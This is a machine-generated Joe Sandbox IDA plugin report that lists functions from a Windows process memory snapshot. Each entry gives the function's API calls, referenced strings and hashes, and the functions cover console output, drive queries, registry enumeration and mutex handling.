Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$Write_get_osfhandle$Mode
String ID:
API String ID: 1066134489-0
Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
Instruction ID: f9bb77d361fe84d62fe57b5301cdbaa8ff98811081bd3b0bb7325086de44816f
Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
Instruction Fuzzy Hash: D5519062B08642D7EE645F25A90697AA7A1FF44B94F0C443EDE0EA7790DF3CE440CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F789C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F78A18

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F78A62
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F78ABA
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F78AE1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8B3FC
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F8B424

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$DriveErrorInformationLastTypeVolume
String ID:
API String ID: 850181435-0
Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
Instruction ID: 1ba4b6f835123160b3d723a29114ab72685732f70c7921ee4bdc766759ca9b33
Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
Instruction Fuzzy Hash: 71416D32608BC1CAEB608F21D8462E977B4FF89B48F494539DA4D9BB58CF38D545C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F834A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F83578: _get_osfhandle.MSVCRT ref: 00007FF683F83584
Part of subcall function 00007FF683F83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F8359C
Part of subcall function 00007FF683F83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835C3
Part of subcall function 00007FF683F83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835D9
Part of subcall function 00007FF683F83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835ED
Part of subcall function 00007FF683F83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F83602

AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F83514
_get_osfhandle.MSVCRT ref: 00007FF683F83522
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F83541
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F8355E

Part of subcall function 00007FF683F836EC: _get_osfhandle.MSVCRT ref: 00007FF683F83715
Part of subcall function 00007FF683F836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF683F83770
Part of subcall function 00007FF683F836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F83791

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
String ID:
API String ID: 4057327938-0
Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
Instruction ID: 28f01d3a79e1e1341409a5a32b30913507142bc018084114336c1951e33495e0
Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
Instruction Fuzzy Hash: 1D316F25B08A43D6EB599B26940207DA6A0FF99B41F5C413EDE4EE33A5DE3CE805C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

_wcsicmp.MSVCRT ref: 00007FF683F9BE98
_wcsicmp.MSVCRT ref: 00007FF683F9BEC5
_wcsicmp.MSVCRT ref: 00007FF683F9BEFA

Strings

KEYS, xrefs: 00007FF683F9BEE2
OFF, xrefs: 00007FF683F9BEBB, 00007FF683F9BEDB
LIST, xrefs: 00007FF683F9BEF0

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
String ID: KEYS$LIST$OFF
API String ID: 411561164-4129271751
Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
Instruction ID: 6a96af3a8b9e14b67034338194bcc19aba75b70a5269df98b0a4bb87d3fee05a
Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
Instruction Fuzzy Hash: 93213020A09A03D6FB589F65E44317566A1FF88794F489239CA1EE72E4DF7CEC45C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F801B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F801C4
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F801D6
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F80212
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F80228
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F8023C
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F80251

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
Instruction ID: 04eae5cf1807b772149c35e8ca4478ec5bc5bafab7e4dd1b617da1f2af6f80b6
Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
Instruction Fuzzy Hash: A321AC22A4CA83D7EA544B61A586238AA90FF4A769F5C413DDA0EA76D0CF7CA444C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F83578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F83584
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F8359C
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835C3
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835D9
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835ED
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F83602

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
Instruction ID: 5d4e0456edaf0c4272ea617570ebab0a303301004b3f18384d574e0a00fdf1a0
Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
Instruction Fuzzy Hash: BE118E25A08A43C6EE544B25A546478AAA0FF4A769F0C533ADA2FA33E0DE3CD445C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F89584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F895B4
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F895C2
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F895CE
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F895DA
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F895EA
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0 ref: 00007FF683F89605

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
Instruction ID: 1178c2e242b34b42cd1c5f3d21e9c1277f0fe75539ecd018cc84012f8ca3bb83
Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
Instruction Fuzzy Hash: 5C114F26604B41CBEF00DF61E8551A933A4FB0975CF440A39EA6D97B94DF7CD1A4C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F971F9
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F9720D
OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F97300

Part of subcall function 00007FF683F95740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF683F975C4,?,?,00000000,00007FF683F96999,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F95744

Strings

_p0, xrefs: 00007FF683F971B3
wil, xrefs: 00007FF683F9725E, 00007FF683F97338

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: OpenSemaphore$CloseErrorHandleLast
String ID: _p0$wil
API String ID: 455305043-1814513734
Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
Instruction ID: 448c4bbe248aa2e56846f5780503948a17966ccd6808b4fe925f33a2467456dc
Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
Instruction Fuzzy Hash: 3561C321B18742C2EF259F5598122B963A1FF88B84F5C4439DE0EAB794DF3CE50AC780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F71DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F71E21

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F71F23

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

iswspace.MSVCRT ref: 00007FF683F905B0

Strings

%s, xrefs: 00007FF683F71EF3

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heapiswspacememset$AllocProcess
String ID: %s
API String ID: 2401724867-3043279178
Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
Instruction ID: c67b460970da9b81ef371accab7a1b99db1c64384e288021e6c7fbf15a31b2f1
Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
Instruction Fuzzy Hash: 8E51A072A09682C5EB618F21D8126F973A0FF49B94F484139DE5DAB794EF3CE445C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT ref: 00007FF683F7E29D
iswdigit.MSVCRT ref: 00007FF683F7E310

Strings

GeToken: (%x) '%s', xrefs: 00007FF683F8CC39

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswdigit
String ID: GeToken: (%x) '%s'
API String ID: 3849470556-1994581435
Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
Instruction ID: 9c3c27a47cfa0c35c89c2a29557c0d3c6fd63566df9c3081d88f20241c986082
Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
Instruction Fuzzy Hash: B3517821A08692C5EB649F56A4462797BB0FF64B54F08843ADA5DE3390DF7CE881CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F99A10
RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F99994

Part of subcall function 00007FF683F9A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF683F99A82), ref: 00007FF683F9A77A
Part of subcall function 00007FF683F9A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF683F99A82), ref: 00007FF683F9A839
Part of subcall function 00007FF683F9A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF683F99A82), ref: 00007FF683F9A850

wcsrchr.MSVCRT ref: 00007FF683F99A62

Strings

%s=%s, xrefs: 00007FF683F999E1, 00007FF683F99AA0
., xrefs: 00007FF683F999AA

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorLast$CloseEnumOpenwcsrchr
String ID: %s=%s$.
API String ID: 3242694432-4275322459
Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
Instruction ID: fa1b985ddc6fe121a51a766bc233273d8d3fef7a7f230dd79c835d78d91c34a4
Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
Instruction Fuzzy Hash: C241D221A0D782C5FE249F11A4522BA62A0FF8ABE0F4D4239DD5DA73D5EE3CE445C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F954B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F954E6
CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F9552E

Part of subcall function 00007FF683F9758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF683F96999,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F975AE
Part of subcall function 00007FF683F9758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF683F96999,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F975C6

Strings

Local\SM0:%d:%d:%hs, xrefs: 00007FF683F954F7
wil, xrefs: 00007FF683F95592, 00007FF683F955B8, 00007FF683F955E2, 00007FF683F95674
x, xrefs: 00007FF683F95501

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorLast$CreateCurrentMutexProcess
String ID: Local\SM0:%d:%d:%hs$wil$x
API String ID: 779401067-630742106
Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
Instruction ID: 1da649cbf84b76135898783012c2eb04de58e94f0efaa8a0303c5ba07a2a10ec
Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
Instruction Fuzzy Hash: D4519472618682C2EB21DF11E4427FA6361FF84794F49403AEE4DEBA55DE3CD505C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F841AD
towupper.MSVCRT ref: 00007FF683F841E1

Strings

:, xrefs: 00007FF683F8ECC3
:, xrefs: 00007FF683F841F2

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CurrentDirectorytowupper
String ID: :$:
API String ID: 238703822-3780739392
Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
Instruction ID: 3fa31a892da4bb0ee3457153e00f3ff4ca2bef95f52c0a16aa51f9a378e197c7
